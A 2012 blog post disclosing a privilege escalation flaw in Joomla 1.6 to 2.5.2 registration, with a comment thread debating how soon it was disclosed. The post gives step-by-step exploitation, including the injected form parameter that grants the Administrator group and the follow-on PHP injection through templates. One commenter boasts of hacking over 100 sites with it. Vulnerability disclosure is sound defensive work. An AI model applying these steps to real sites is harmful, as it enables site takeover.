Thursday, 15 March 2012 14:47

Joomla! 1.6.x/1.7.x/2.5.0-2.5.2 suffers from a privilege escalation vulnerability that allows users to be registered into any group not having 'core.admin' privileges.

In order to be exploited, an attacker must visit index.php?option=com_users&view=registration and start creating a new user. During the initial creation, the attacker must cause the registration to fail by either NOT using the same password in both password fields or by purposefully failing the captcha (in 2.5.x). Before submitting the form, the attacker can use Firebug/Tamper Data to add the following parameter to the form data (assuming the site still has the default user groups enabled):

  • Firebug: <input name="jform[groups][]" value="7" />
  • Tamper Data: jform[groups][]=7

The form should reload, complaining that the passwords didn't match. This causes the group data to be stored into the session as form data. Once this is complete, giving valid values for the password fields and re-adding the parameter from before will cause the newly registered user to be assigned to the "Administrator" group because the user registration model reassigns the user to any group found to already exist in the session form data (but NOT to the groups directly given in the request).

After activating the account, the attacker will have a valid account with permissions to log in to the administrator/ interface, edit one of the templates, and inject php code (assuming the stock permissions/user groups are still in effect). Joomla! versions 1.6.x and 1.7.x also allow users in the "Administrator" group to install extensions, thus opening another avenue for code injection.

Joomla! versions 1.0.x, 1.5.x, and 2.5.3+ are not vulnerable. No patch has been issued for 1.6.x or 1.7.x and users of these versions are strongly urged to upgrade to 2.5.3 immediately.

Timeline

  • Vendor Notified: 11 March 2012
  • Vendor Response: 11 March 2012
  • Update Available: 15 March 2012
  • Disclosure: 15 March 2012
Last Updated on Thursday, 15 March 2012 15:01
 
Comments (13)
1 Thursday, 15 March 2012 15:40
Tijn!
Je bent een eikel
2 Thursday, 15 March 2012 15:47
Jeff Channell
Google translate says this means, "You're a jerk." Maybe next time I'll just release it without sending it to the JSST first? Or maybe I'll hand it off to some less-than-reputable folks with malicious intent in a private manner? Or maybe you're mad I disclosed something you were actively exploiting sites with yourself?

Whatever. Thanks for the comment, asshole...
3 Thursday, 15 March 2012 16:36
Nick Savov
Thanks for reporting this, Jeff!

Kind regards,
Nick
4 Thursday, 15 March 2012 17:17
Alan Langford
Obviously Tijn has never heard the phrase "don't shoot the messenger".

Let's be clear about this, the vulnerability is Joomla's responsibility, not Jeff's. As a member of the project, and the security team, I hate seeing this sort of thing at least as much as anyone else, but I'd much rather see a note from Jeff in the security inbox than a description of the attack on a hacker board.

Still, disclosure shortly after an update does cause some hardship. Right now we have webmasters who are just waking up to discover the update, and they haven't had a chance to apply it. A simple description of the attack vector like this makes it much more likely that they're also waking up to a hacked site.

If the simple description was held back for a while, then only hackers willing to understand the changes to the code would be developing exploits, and that would buy a significant number of sites a few more hours time.

So what Tijn might have been better off saying is "your timing is less than optimal". "Jerk" is, IMO, unjustified.

I agree with Jeff's comment: it could also been one hell of a lot worse. He deserves credit for not making it so.
5 Friday, 16 March 2012 03:51
Tijn!
Let me say first: 'Jeff deserves praise for finding and reporting this issue'. But secondly 'showing how to do this, just a couple of hours after the bug fix release is a crime'.
First saving someone from a burning house and after this drowning him is bad.
All over the world people are sleeping (it is always somewhere at night), having holidays, doing other things. Not everybody is following Joomla for 24 hours a day. Joomla is used by a lot of free time "developers".
Al the hacks in the next days are a blame for Joomla. This is giving Joomla a bad name!
What you do is just expose yourself and don't think about the consequences.
Alan says 'don't shoot the messenger', well, I don't shoot the first messenger, but I do shoot the second one.
Alan says "the vulnerability is Joomla's responsibility, not Jeff's". Joomla is 'us', so it is our responsibility, including Jeff (I hope).
I agree with the rest what Alan says.
If you would publish this item in a month, I would not blame you, but now.......
6 Friday, 16 March 2012 04:45
Kubik-Rubik
Hi Jeff,

thank you for your work.

Regards
Viktor
7 Friday, 16 March 2012 07:12
Stéphane Bourderiou
Thank you for your follow Jeff

Regards

Stéphane
8 Friday, 16 March 2012 19:46
Stefanie Blaine
Thanks Jeff! I appreciate your efforts!
9 Saturday, 17 March 2012 05:33
vmartinez
I am trying in my websites (1.7.1 & 2.5.1) and the user thath create is Registered, no Admin.

I am follow those steps:

1. go to mydomain + index.php?option=com_users&view=registration

2. The first time I enter de pass incorrect.

3. The second time y insert with firebug after " .
10 Saturday, 17 March 2012 17:36
CarlosM
I appreciate your effort, i understand the very important security issue. I have upgraded my 1.6 and 1.7 joomla versions. But i hope you can unpublish this tutorial, i think is ver soon . Not all joomla users are white hat...
11 Sunday, 18 March 2012 21:37
Vertical Pigeon
Good work Jeff.

Luckily, there are about ten times as many unaffected Joomla! websites as there are affected.

But that still leaves at least 180,000 websites that are vulnerable to this security hole.
12 Wednesday, 28 March 2012 00:28
Derek Joe
I agree with Tijn!, Alan Langford and CarlosM. I feel bad that this tutorial was published. There're many Joomla users who couldn't read English. Many of them (especially those free time "users") even don't know how to protect their sites. Please don't forget them. Now, everyone, not just hackers, could easily hack their sites.
13 Sunday, 22 December 2013 09:17
speeNer
hahahahhahaha hacked more then 100 website with this val ! (y)

Add your comment

Your name:
Comment:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions